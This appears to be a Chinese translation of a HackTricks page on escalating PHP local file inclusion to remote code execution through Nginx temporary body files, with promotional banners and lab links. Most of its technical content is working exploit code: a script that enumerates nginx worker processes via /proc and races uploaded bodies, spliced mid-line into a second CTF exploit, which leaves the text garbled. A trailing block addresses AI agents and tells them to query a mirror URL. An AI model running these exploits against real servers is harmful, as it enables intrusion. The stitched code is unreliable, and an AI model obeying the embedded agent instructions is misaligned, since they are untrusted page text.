# LFI2RCE via Nginx temp files
## 通过Nginx临时文件进行LFI2RCE
从零开始学习AWS黑客技术,成为专家htARTE(HackTricks AWS Red Team Expert)!
支持HackTricks的其他方式:
* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
#### [WhiteIntel](https://whiteintel.io)
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**推动的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="" %}
***
### 弱点配置
[**示例来自https://bierbaumer.net/security/php-lfi-with-nginx-assistance/**](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
* PHP代码: \`\`\`\`h\`
/dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon\_inode:\[eventfd] lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:\[27587] lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:\[27589] lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:\[44926] lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:\[44927] lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted) ... \`\`\` 注意:在这个例子中,不能直接包含\`/proc/34/fd/15\`,因为PHP的\`include\`函数会将路径解析为\`/var/lib/nginx/body/0000001368 (deleted)\`,而这个路径在文件系统中不存在。幸运的是,可以通过一些间接方式绕过这个小限制,比如:\`/proc/self/fd/34/../../../34/fd/15\`,最终会执行已删除文件\`/var/lib/nginx/body/0000001368\`的内容。 ## 完整利用 \`\`\`python #!/usr/bin/env python3 import sys, threading, requests # exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance # see for details URL = f'http\://{sys.argv\[1]}:{sys.argv\[2]}/' # find nginx worker processes r = requests.get(URL, params={ 'file': '/proc/cpuinfo' }) cpus = r.text.count('processor') r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid\_max' }) pid\_max = int(r.text) print(f'\[\*] cpus: {cpus}; pid\_max: {pid\_max}') nginx\_workers = \[] for pid in range(pid\_max): r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'\[\*] nginx worker found: {pid}') nginx\_workers.append(pid) if len(nginx\_workers) >= cpus: break done = False # upload a big client body to force nginx to create a /var/lib/nginx/body/$X def uploader(): print('\[+] starting uploader') while not done: requests.get(URL, data=' //'
requests\_session.post(SERVER + "/?action=read\&file=/bla", data=(payload + ("a" \* (body\_size - len(payload))))) except: pass
def send\_payload\_worker(requests\_session): while True: send\_payload(requests\_session)
def send\_payload\_multiprocess(requests\_session):
## Use all CPUs to send the payload as request body for Nginx
for \_ in range(multiprocessing.cpu\_count()): p = multiprocessing.Process(target=send\_payload\_worker, args=(requests\_session,)) p.start()
def generate\_random\_path\_prefix(nginx\_pids):
## This method creates a path from random amount of ProcFS path components. A generated path will look like /proc/\/cwd/proc/\/root/proc/\/root
path = "" component\_num = random.randint(0, 10) for \_ in range(component\_num): pid = random.choice(nginx\_pids) if random.randint(0, 1) == 0: path += f"/proc/{pid}/cwd" else: path += f"/proc/{pid}/root" return path
def read\_file(requests\_session, nginx\_pid, fd, nginx\_pids): nginx\_pid\_list = list(nginx\_pids) while True: path = generate\_random\_path\_prefix(nginx\_pid\_list) path += f"/proc/{nginx\_pid}/fd/{fd}" try: d = requests\_session.get(SERVER + f"/?action=include\&file={path}").text except: continue
## Flags are formatted as hxp{}
if "hxp" in d: print("Found flag! ") print(d)
def read\_file\_worker(requests\_session, nginx\_pid, nginx\_pids):
## Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing - it's very common for the request body FD to open within this range
for fd in range(10, 45): thread = threading.Thread(target = read\_file, args = (requests\_session, nginx\_pid, fd, nginx\_pids)) thread.start()
def read\_file\_multiprocess(requests\_session, nginx\_pids): for nginx\_pid in nginx\_pids: p = multiprocessing.Process(target=read\_file\_worker, args=(requests\_session, nginx\_pid, nginx\_pids)) p.start()
if **name** == "**main**": print('\[DEBUG] Creating requests session') requests\_session = create\_requests\_session() print('\[DEBUG] Getting Nginx pids') nginx\_pids = get\_nginx\_pids(requests\_session) print(f'\[DEBUG] Nginx pids: {nginx\_pids}') print('\[DEBUG] Starting payload sending') send\_payload\_multiprocess(requests\_session) print('\[DEBUG] Starting fd readers') read\_file\_multiprocess(requests\_session, nginx\_pids)
```
## 实验室
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz)
* [https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/](https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/)
* [https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/](https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/)
## 参考资料
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
### [WhiteIntel](https://whiteintel.io)
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**威胁**。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
从零开始学习AWS黑客技术,成为专家htARTE(HackTricks AWS Red Team Expert)!
支持HackTricks的其他方式:
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://hacktricks.xsx.tw/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
.png)